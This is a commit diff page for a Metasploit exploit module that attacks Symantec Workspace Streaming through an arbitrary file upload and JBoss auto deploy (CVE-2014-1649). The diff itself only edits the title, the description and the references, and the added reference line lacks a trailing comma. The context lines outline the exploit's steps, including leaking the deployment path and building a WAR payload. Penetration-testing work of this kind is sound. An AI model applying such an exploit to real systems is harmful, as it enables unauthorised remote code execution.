infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

enhance title and description, add OSVDB reference, standardized JBoss

bug/bundler_fix
Darius Freamon 2015-04-29 11:39:40 -06:00
parent 59ccf93b55
commit 5f0736fa4c
1 changed files with 8 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
View File

@ -15,15 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Workspace Streaming Arbitrary File Upload',
'Name' => 'Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Symantec Workspace Streaming. The
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
as_agent.exe service, which allows for uploading arbitrary files under the server root.
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
to achieve remote code execution. This module has been tested successfully on Symantec
Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
machine deployment, and also in the backend role in a multiple machine deployment.
Workspace Streaming 6.1 SP8 and Windows 2003 SP2, and reported to affect 7.5.0.x.
Abused services listen on a single machine deployment, and also in the backend role in
a multiple machine deployment.
},
'Author' =>
[
@ -35,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2014-1649'],
['BID', '67189'],
['OSVDB', '106923']
['ZDI', '14-127'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
],
@ -51,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse JBoss auto deploy)
], self.class)
end
@ -227,11 +229,11 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
print_status("#{peer} - Leaking the jboss deployment directory...")
print_status("#{peer} - Leaking the JBoss deployment directory...")
jboss_path =jboss_deploy_path
if jboss_path.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
fail_with(Failure::Unknown, "#{peer} - Failed to disclose the JBoss deployment directory")
end
print_status("#{peer} - Building WAR payload...")